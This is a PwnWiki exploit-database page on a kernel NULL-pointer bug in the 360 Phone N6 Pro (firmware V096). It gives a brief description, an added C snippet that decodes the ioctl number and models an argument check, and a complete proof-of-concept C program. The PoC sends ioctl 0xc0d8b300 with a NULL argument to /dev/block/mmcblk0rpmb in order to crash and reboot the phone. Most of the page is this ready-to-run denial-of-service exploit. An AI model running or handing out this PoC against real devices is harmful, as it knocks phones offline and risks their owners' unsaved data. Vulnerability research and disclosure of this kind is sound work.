Difference between revisions of "360 Phone N6 Pro內核漏洞/en"

From PwnWiki

Latest revision as of 11:38, 31 May 2021


Principle of the vulnerability

The kernel module in the 360 Phone N6 Pro V096 kernel component allows an attacker to issue ioctl command 3235427072 on the device /dev/block/mmcblk0rpmb with a crafted argument and crash the kernel.
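
Decoding the command number shows what the handler is told to expect from its argument. This is an added example, not code from the PwnWiki page or from the vendor; it assumes the asm-generic Linux ioctl number layout used on arm64, and `ioc_precheck` is a hypothetical user-space model of a handler-side argument check.

```c
#include <errno.h>
#include <stdint.h>
#include <stdio.h>

/* asm-generic ioctl layout (arm64 uses it): dir:2 | size:14 | type:8 | nr:8 */
enum { IOC_NONE = 0, IOC_WRITE = 1, IOC_READ = 2 };

/* dir: transfer direction bits, size: argument struct size in bytes,
 * type: driver "magic" byte, nr: command ordinal within that driver */
struct ioc_fields { unsigned dir, size, type, nr; };

static struct ioc_fields ioc_decode(uint32_t cmd)
{
    struct ioc_fields f;
    f.nr   = cmd & 0xffu;
    f.type = (cmd >> 8) & 0xffu;
    f.size = (cmd >> 16) & 0x3fffu;
    f.dir  = (cmd >> 30) & 0x3u;
    return f;
}

/* Render the command as the _IO* macro call that would produce it. */
static int ioc_describe(uint32_t cmd, char *buf, size_t len)
{
    static const char *const macro[] = { "_IO", "_IOW", "_IOR", "_IOWR" };
    struct ioc_fields f = ioc_decode(cmd);
    return snprintf(buf, len, "%s(0x%02x, %u, %u bytes)",
                    macro[f.dir], f.type, f.nr, f.size);
}

/* Hypothetical model of the check a handler needs before touching arg:
 * a command that encodes a user buffer must not be given NULL. */
static int ioc_precheck(uint32_t cmd, const void *arg)
{
    struct ioc_fields f = ioc_decode(cmd);
    if (f.dir != IOC_NONE && f.size > 0 && arg == NULL)
        return -EFAULT;
    return 0;
}

int main(void)
{
    char text[64];
    const uint32_t cmd = 3235427072u;   /* command number from the PoC */
    ioc_describe(cmd, text, sizeof text);
    printf("0x%08x = %s, NULL arg -> %d\n", (unsigned)cmd, text, ioc_precheck(cmd, NULL));
    return 0;
}
```

The type byte 0xb3 is 179, the MMC block major number that upstream Linux uses as the magic for its MMC ioctls, and the encoded direction and size mean the handler expects a pointer to a 216-byte structure that is both read and written.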

Impact of the vulnerability

360 Phone N6 Pro 1801-A01

POC

/*
 * PoC for the 360 N6 Pro, 1801-A01
 * Android Version: 7.1.1
 * Version Number: V096
 * Kernel Version: Linux localhost 4.4.21-perf #1 SMP PREEMPT Wed Mar 28 15:24:20 UTC 2018 aarch64
 * A NULL pointer bug in the ioctl interface of device file /dev/block/mmcblk0rpmb crashes the system via IOCTL 3235427072.
 * This PoC must run with permission to do ioctl on /dev/block/mmcblk0rpmb.
 */
#include <stdio.h>
#include <stdlib.h>     /* system() */
#include <unistd.h>     /* close() */
#include <fcntl.h>
#include <errno.h>
#include <sys/ioctl.h>

static const char *driver = "/dev/block/mmcblk0rpmb";
static const unsigned long command = 3235427072UL; // 0xc0d8b300

int main(int argc, char **argv, char **env) {
    int fd = 0;

    /* Opening the RPMB block node requires the permission noted above. */
    fd = open(driver, O_RDWR);
    if (fd < 0) {
        printf("Failed to open %s, with errno %d\n", driver, errno);
        system("echo 1 > /data/local/tmp/log");
        return -1;
    }

    printf("Try ioctl device file '%s', with command 0x%lx and payload NULL\n", driver, command);
    printf("System will crash and reboot.\n");

    /* The NULL argument is the trigger; this branch runs only if the kernel survives the call. */
    if (ioctl(fd, command, NULL) < 0) {
        printf("Allocation of structs failed, %d\n", errno);
        system("echo 2 > /data/local/tmp/log");
        return -1;
    }
    close(fd);
    return 0;
}